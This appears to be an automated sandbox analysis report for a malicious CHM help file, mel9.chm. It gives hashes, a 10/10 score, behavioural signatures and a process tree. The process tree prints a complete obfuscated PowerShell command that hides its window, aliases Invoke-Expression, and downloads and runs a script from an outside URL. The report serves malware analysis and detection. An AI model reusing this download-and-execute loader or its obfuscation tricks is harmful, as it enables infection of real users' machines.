Analysis
-
max time kernel
50s -
max time network
76s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
08-12-2022 11:15
Static task
static1
Behavioral task
behavioral1
Sample
mel9.chm
Resource
win7-20220812-en
windows7-x64
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
mel9.chm
Resource
win10v2004-20221111-en
windows10-2004-x64
9 signatures
150 seconds
General
-
Target
mel9.chm
-
Size
13KB
-
MD5
e7a3bc55f52eebb6ce7df0a0047fec40
-
SHA1
b152e0d6abc8dab4500aaa4161dac968e54cad20
-
SHA256
908d78eb614a8ecf652163a4ccbdf62deec33d03747d4342d4f90e5bcf7995d8
-
SHA512
3537fee98df7a02510e65c4a7fbe302e154d37e5ea497fe2677936f3442afc565a4a6307a870971ca3f45a8d25bee50b71a04c515664737cbe72d4031a186a81
-
SSDEEP
192:8FYhJztroZ7rRXcAU9aoSpW9KZYtsufMCKv6:gYjtroZ7rAv9yYtsuFKv
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://cricot2.kylos.pl/mel9.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 6 1372 powershell.exe 7 1372 powershell.exe -
Processes:
hh.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main hh.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1372 powershell.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1372 powershell.exe Token: SeIncreaseQuotaPrivilege 1372 powershell.exe Token: SeSecurityPrivilege 1372 powershell.exe Token: SeTakeOwnershipPrivilege 1372 powershell.exe Token: SeLoadDriverPrivilege 1372 powershell.exe Token: SeSystemProfilePrivilege 1372 powershell.exe Token: SeSystemtimePrivilege 1372 powershell.exe Token: SeProfSingleProcessPrivilege 1372 powershell.exe Token: SeIncBasePriorityPrivilege 1372 powershell.exe Token: SeCreatePagefilePrivilege 1372 powershell.exe Token: SeBackupPrivilege 1372 powershell.exe Token: SeRestorePrivilege 1372 powershell.exe Token: SeShutdownPrivilege 1372 powershell.exe Token: SeDebugPrivilege 1372 powershell.exe Token: SeSystemEnvironmentPrivilege 1372 powershell.exe Token: SeRemoteShutdownPrivilege 1372 powershell.exe Token: SeUndockPrivilege 1372 powershell.exe Token: SeManageVolumePrivilege 1372 powershell.exe Token: 33 1372 powershell.exe Token: 34 1372 powershell.exe Token: 35 1372 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 1912 hh.exe 1912 hh.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
hh.exedescription pid process target process PID 1912 wrote to memory of 1372 1912 hh.exe powershell.exe PID 1912 wrote to memory of 1372 1912 hh.exe powershell.exe PID 1912 wrote to memory of 1372 1912 hh.exe powershell.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\mel9.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://cricot2.kylos.pl/mel9.txt')|P2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1372-55-0x0000000000000000-mapping.dmp
-
memory/1372-57-0x000007FEF1BD0000-0x000007FEF25F3000-memory.dmpFilesize
10.1MB
-
memory/1372-58-0x000007FEEDD90000-0x000007FEEE8ED000-memory.dmpFilesize
11.4MB
-
memory/1372-59-0x0000000002734000-0x0000000002737000-memory.dmpFilesize
12KB
-
memory/1372-60-0x000000000273B000-0x000000000275A000-memory.dmpFilesize
124KB
-
memory/1372-61-0x0000000002734000-0x0000000002737000-memory.dmpFilesize
12KB
-
memory/1372-62-0x000000000273B000-0x000000000275A000-memory.dmpFilesize
124KB
-
memory/1912-54-0x000007FEFB831000-0x000007FEFB833000-memory.dmpFilesize
8KB